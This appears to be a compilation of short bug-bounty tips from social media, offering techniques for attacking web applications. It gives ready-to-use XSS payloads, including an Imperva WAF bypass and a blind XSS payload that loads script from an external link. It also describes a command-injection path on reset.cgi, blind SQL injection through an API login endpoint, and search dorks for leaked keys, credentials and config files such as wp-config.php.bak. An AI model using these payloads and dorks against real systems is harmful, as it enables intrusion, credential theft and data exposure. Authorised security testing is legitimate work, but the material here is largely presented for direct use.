Cool Blind #SQLi. The target has an admin login page where certain methods are allowed. I found the API endpoint for the admin login and sent the same payload. Success.
POST /admin/login ==> 405
POST /api/v01/admin/login ==> 200 OK + Blind SQLi
By:@nav1n0x
#bugbountytips
Discovered an XSS vulnerability but Imperva WAF blocked it?
Try this XSS payload to bypass Imperva's protection.
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
#bugbounty#bypass_imperva#xss#hacking
Many people have often asked me how to search for "ivanti" for shodan 😊 you can search as title: "Ivanti Connect" hostname: "target.*"
credit: @ynsmroztas#bugbountytip#bugbounty
#XSS could be be triggers in #url itself, no need to parameter injection✌🏻
Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E
2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
#bugbounty#bugbountytip#bugbountytips#MrHex88
story of very quick RCE
Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can to add this paths for ur wordlist
cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
cgi-bin/reset.cgi?db_prefix=%26id%26
fuzzing as well
cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips ❤️
I found lot bugs using this dorks in github
"https://t.co/nPyT6Tim2M" language:yml
"Target. com" language:yml "_key"
"Target. com" language:yml "admin"
"Target. com" language:yml "root"
"Target. com" language:yml "host"
#bugbountytip#bugbountytips#bugbounty#infosec
Blind xss
Payload used : --></tiTle></stYle></texTarea></scrIpt>"//'//><scrIpt src= https://t.co/Pr7wsHHz8L></scrIpt>
Tips: In some cases use bing dorking cuz google may not show what bing showed me . Especially In case of Microsoft bing dorking is fruitful.
Quick tip
wp-config.php -> 403 forbidden
wp-config.php.bak -> 200 ok
The file download and contained the DB credentials, other sensitive date leaked in it
#bugbountytips#bugbountytip#bugbounty
After more than three hours we were able to bypass this xss
with @Arez_1110
payload
#"></div><a href= javascript&colon;alert&lpar;document&period;domain)
#bugbounty#bugbountytip#hackerone
Bug Bounty Tip
Don't forget to check for the /_wpeprivate/config.json endpoint on a website (usually with WordPress) for information disclosure.
Google Dork
👉 Site: *.example.com inurl:"_wpeprivate"
Cheers!